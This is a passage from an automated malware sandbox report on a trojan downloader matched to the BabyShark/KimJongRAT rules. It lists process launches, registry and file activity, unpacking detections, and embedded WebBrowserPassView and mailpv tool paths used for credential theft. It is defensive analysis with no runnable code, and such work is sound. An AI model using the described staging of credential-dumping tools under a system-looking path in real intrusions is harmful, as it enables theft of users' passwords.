                Source: 9.1.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 9.2.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: classification engineClassification label: mal100.phis.bank.troj.spyw.evad.winEXE@25/7@0/5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,7_2_004183B8
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,7_2_00418842
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification,7_2_00413C19
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0046392F CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,0_2_0046392F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0043DBEF __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,0_2_0043DBEF
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeFile created: C:\Users\user\AppData\Local\Microsoft\OutlookJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5912:120:WilError_01
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeFile created: C:\Users\user\AppData\Local\Temp\CB36.tmpJump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCommand line argument: ~`@6_2_00405FD0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCommand line argument: ~`@6_2_00405FD0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCommand line argument: ~`@6_1_00405FD0
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: msfeedsbs.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msfeedsbs.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msfeedsbs.exe, 00000001.00000003.279002576.00000000039FD000.00000004.00000001.sdmp, msfeedsbs.exe, 00000007.00000002.277303523.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msfeedsbs.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msfeedsbs.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msfeedsbs.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msfeedsbs.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe C:\Windows\SysWOW64\msi\msfeedsbs.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbsoe.exe 'C:\Windows\SysWOW64\msi\msfeedsbsoe.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe C:\Windows\SysWOW64\msi\msfeedsbs.exeJump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbsoe.exe 'C:\Windows\SysWOW64\msi\msfeedsbsoe.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\RPCJump to behavior
                Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: msfeedsbs.exe
                Source: Binary string: cmd.pdbUGP source: msfeedsbsoe.exe, 0000000A.00000002.278554157.00007FF6F52AE000.00000002.00020000.sdmp, msfeedsbsoe.exe.1.dr
                Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: msfeedsbs.exe
                Source: Binary string: cmd.pdb source: msfeedsbsoe.exe, 0000000A.00000002.278554157.00007FF6F52AE000.00000002.00020000.sdmp, msfeedsbsoe.exe.1.dr

                Data Obfuscation:

                barindex
                Detected unpacking (changes PE section rights)Show sources
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeUnpacked PE file: 6.2.msfeedsbs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeUnpacked PE file: 7.2.msfeedsbs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeUnpacked PE file: 9.2.msfeedsbs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Detected unpacking (overwrites its own PE header)Show sources
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeUnpacked PE file: 6.2.msfeedsbs.exe.400000.0.unpack
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeUnpacked PE file: 7.2.msfeedsbs.exe.400000.0.unpack
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeUnpacked PE file: 9.2.msfeedsbs.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0044112E GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_0044112E
                Source: msfeedsbsoe.exe.1.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_00412FD0 push eax; ret 0_2_00412FFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004134C8 push eax; ret 0_2_004134E6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_00412FD0 push eax; ret 1_2_00412FFE
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004134C8 push eax; ret 1_2_004134E6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_004048C5 push ecx; ret 6_2_004048D8
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_004048C5 push ecx; ret 6_1_004048D8
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00445190 push eax; ret 7_2_004451A4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00445190 push eax; ret 7_2_004451CC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00449EB4 push eax; ret 7_2_00449EC1
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00444F79 push ecx; ret 7_2_00444F89
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_00445190 push eax; ret 7_1_004451A4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_00445190 push eax; ret 7_1_004451CC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_00412341 push ecx; ret 9_2_00412351
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_00412360 push eax; ret 9_2_00412374
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_00412360 push eax; ret 9_2_0041239C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_00412341 push ecx; ret 9_1_00412351
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_00412360 push eax; ret 9_1_00412374
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_00412360 push eax; ret 9_1_0041239C

                Persistence and Installation Behavior:

                bar